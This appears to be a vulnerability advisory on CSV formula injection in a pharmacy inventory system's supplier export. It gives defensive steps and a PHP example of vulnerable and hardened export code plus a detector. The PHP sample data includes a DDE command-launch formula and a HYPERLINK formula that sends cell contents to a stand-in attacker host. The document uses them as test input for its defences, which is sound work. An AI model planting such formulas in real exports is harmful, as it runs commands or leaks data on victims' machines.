PatchSiren cyber security CVE debrief
CVE-2026-10248 SourceCodester CVE debrief
A CSV injection (formula injection) vulnerability exists in SourceCodester Pharmacy Sales and Inventory System up to version 1.0, specifically within the Supplier Creation Interface. The flaw resides in the create_supplier function of the /Export_csv/export file, where the Address and Company Name parameters are written to CSV output without neutralising formula-triggering characters. An attacker with sufficient privileges can store spreadsheet formulas in these fields; the formulas are evaluated when a victim opens the exported CSV in a spreadsheet application. The vulnerability requires high privileges (PR:H), and a public exploit is noted in the disclosure. The CVSS 4.0 vector indicates a network attack vector with low attack complexity and no user interaction for the initial injection; the payload itself only fires once a victim opens the exported file.
- Vendor: SourceCodester
- Product: Pharmacy Sales and Inventory System
- CVSS: 2.0 (LOW), CVSS 4.0
- CISA KEV: Not listed in stored evidence
- Original CVE published: 2026-06-01
- Original CVE updated: 2026-06-01
- Advisory published: 2026-06-01
- Advisory updated: 2026-06-01
Who should care
Organizations using SourceCodester Pharmacy Sales and Inventory System for supplier management; security teams monitoring for formula injection in business application exports; developers implementing CSV export functionality in PHP-based inventory systems
Technical summary
The create_supplier function in /Export_csv/export fails to neutralize special elements in the Address and Company Name parameters, enabling CSV injection (formula injection). A value beginning with a formula-trigger character is written verbatim, so when the exported CSV is opened in a spreadsheet application the cell is evaluated as a formula rather than displayed as text. Depending on the application and its security settings, such a formula can launch a local command (for example via DDE) or leak cell contents to an attacker-controlled URL (for example via HYPERLINK or WEBSERVICE); in every case the victim must open the file and accept any prompts the application shows. The attack vector is network-based with low attack complexity, but high privileges are required to reach the supplier creation function. The vulnerability affects versions up to 1.0 of the Pharmacy Sales and Inventory System.
Defensive priority
low
Recommended defensive actions
- Validate and sanitize all user-supplied input before writing it to CSV files; the characters that mark the start of a formula or control sequence in spreadsheet applications are the equals sign, plus sign, minus sign, at sign, tab (0x09) and carriage return (0x0D), so check the leading character of every cell
- Implement output encoding for CSV generation: prefix any cell that starts with a trigger character with a single quote (which spreadsheets read as a text marker), enclose cells in double quotes and escape embedded double quotes; apply this only on exports bound for spreadsheets, since other consumers will see the added quote as data
- Where the spreadsheet application permits it, import CSV exports with all fields treated as literal text; note that this is a setting on the consumer side and cannot be enforced by the exporting application
- Restrict export functionality to authenticated users with the minimum necessary privileges
- Apply application-level warnings when users download CSV files that may contain formula content
- Review and update supplier creation interfaces to enforce strict input validation on the Address and Company Name fields, rejecting or flagging values that begin with a trigger character
- Monitor for anomalous supplier creation activity, in particular Company Name and Address values that begin with a trigger character or carry the DDE shape of a vertical bar followed by a shell command
- Consider alternative export formats that do not support formula execution when spreadsheet functionality is not required
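The following PHP is an added example, written for this debrief and not taken from SourceCodester's code base, that puts the technical summary and the defensive actions above into working form. It shows the vulnerable export shape described for create_supplier (raw fields written straight into the CSV) beside a hardened version that neutralises formula triggers on output, and an input-time detector that can back the monitoring and validation recommendations. The function names, the column set and the sample supplier rows are assumptions; only the trigger-character list and the single-quote prefix are drawn from standard CSV injection guidance.

```php
<?php
// Added example, not SourceCodester's code. Function names, columns and
// sample rows are assumptions made for illustration.
declare(strict_types=1);

// Leading characters that spreadsheet applications treat as the start of a
// formula or control sequence: = + - @ TAB CR (per OWASP CSV injection guidance).
const FORMULA_TRIGGERS = ['=', '+', '-', '@', "\t", "\r"];

// True if the value would be read as a formula when the CSV is opened in a
// spreadsheet. Leading spaces are ignored deliberately (a conservative choice)
// so that " =1+1" is flagged as well. Use this at supplier-creation time to
// log or reject suspicious Company Name / Address values.
function looks_like_formula(string $value): bool
{
    $trimmed = ltrim($value, ' ');
    if ($trimmed === '') {
        return false;
    }
    return in_array($trimmed[0], FORMULA_TRIGGERS, true);
}

// Neutralises a cell for spreadsheet consumption: a value starting with a
// trigger character gets a leading single quote, which spreadsheets read as
// "this cell is text". fputcsv() handles enclosure and double-quote escaping.
// Apply only on exports bound for spreadsheets; other consumers see the quote.
function csv_safe_cell(string $value): string
{
    return looks_like_formula($value) ? "'" . $value : $value;
}

// Vulnerable shape: fields go into the CSV unchanged, which is the behaviour
// described for create_supplier in /Export_csv/export.
function export_suppliers_unsafe(array $rows): string
{
    $fh = fopen('php://memory', 'r+');
    fputcsv($fh, ['Company Name', 'Address']);
    foreach ($rows as $row) {
        fputcsv($fh, [$row['company_name'], $row['address']]);
    }
    rewind($fh);
    return stream_get_contents($fh);
}

// Hardened shape: every cell passes through csv_safe_cell() before writing.
function export_suppliers_safe(array $rows): string
{
    $fh = fopen('php://memory', 'r+');
    fputcsv($fh, ['Company Name', 'Address']);
    foreach ($rows as $row) {
        $cells = array_map('csv_safe_cell', [$row['company_name'], $row['address']]);
        fputcsv($fh, $cells);
    }
    rewind($fh);
    return stream_get_contents($fh);
}

// Constructed sample data: one benign supplier and one whose Company Name
// carries a DDE-style payload and whose Address carries a HYPERLINK lure
// that would send the contents of cell A1 to an attacker-controlled host.
$suppliers = [
    ['company_name' => 'Acme Pharma Ltd',
     'address'      => '12 High Street, Leeds'],
    ['company_name' => "=cmd|' /C calc'!A0",
     'address'      => '=HYPERLINK("http://attacker.example/?d="&A1,"Open")'],
];

echo "--- unsafe export ---\n", export_suppliers_unsafe($suppliers);
echo "--- hardened export ---\n", export_suppliers_safe($suppliers);

// Input-time check: in the real application this would be an audit-log line
// or a rejection of the supplier record, not an echo to STDERR.
foreach ($suppliers as $s) {
    foreach (['company_name', 'address'] as $field) {
        if (looks_like_formula($s[$field])) {
            fprintf(STDERR, "ALERT formula-like %s: %s\n", $field, $s[$field]);
        }
    }
}
```

Run with `php export_example.php`; the hardened export writes `"'=cmd|' /C calc'!A0"` where the unsafe one writes `"=cmd|' /C calc'!A0"`, and the detector raises an alert for both poisoned fields. The detector and the sanitiser share one predicate so that what is flagged at input and what is neutralised at output cannot drift apart.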
Evidence notes
The vulnerability is classified under CWE-74 (Improper Neutralization of Special Elements in Output) and CWE-1236 (Improper Neutralization of Formula Elements in a CSV File). The CVSS 4.0 score of 2.0 reflects the high privilege requirement and the limited impact scope. Vendor attribution is low confidence: it was derived from the reference domains in the disclosure, which point to VulDB as the primary source rather than to a vendor advisory.
Official resources
Public disclosure occurred on 2026-06-01 with concurrent CVE publication. The issue was reported through VulDB and a GitHub issue tracker. No known active exploitation or ransomware campaign association has been identified.